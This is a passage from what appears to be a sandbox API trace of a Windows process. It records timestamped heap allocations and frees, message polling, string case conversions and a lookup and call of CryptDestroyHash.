(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0259.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0259.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0259.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0259.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0259.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0259.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0259.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0259.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0259.228] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0259.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0259.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0259.228] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0259.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0259.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0259.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0259.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0259.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0259.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0259.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0259.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0259.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0259.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0259.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0259.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0259.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0259.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0259.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0259.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0259.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0259.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0259.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0259.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0259.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0259.230] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0259.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0259.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0259.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0259.231] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0259.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0259.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0259.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0259.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0259.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0259.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0259.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0259.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.231] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0259.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0259.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0259.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0259.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0259.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0259.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0259.232] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0259.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0259.232] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0259.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0259.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0259.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0259.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0259.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0259.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0259.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0259.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0259.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0259.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0259.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0259.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0259.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0259.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0259.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0259.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0259.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0259.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0259.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0259.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0259.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0259.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0259.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0259.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0259.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0259.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0259.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0259.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0259.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0259.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0259.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0259.233] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0259.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0259.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0259.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0259.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0259.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0259.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0259.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0259.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0259.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0259.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0259.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0259.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0259.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0259.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0259.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0259.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0259.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0259.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0259.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0259.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466dd0 [0259.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0259.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0259.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0259.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0259.235] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0259.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0259.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0259.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0259.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0259.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0259.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0259.235] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0259.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0259.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0259.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0259.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0259.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0259.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0259.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0259.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0259.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0259.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0259.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0259.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0259.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0259.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0259.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0259.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0259.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0259.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0259.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0259.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0259.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0259.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0259.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0259.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0259.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0259.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0259.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0259.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0259.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0259.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0259.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0259.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0259.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0259.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0259.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0259.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0259.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0259.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0259.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0259.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0259.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0259.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0259.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0259.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0259.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0259.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0259.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0259.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0259.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0259.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0259.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0259.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0259.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0259.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0259.239] HeapFree (in: 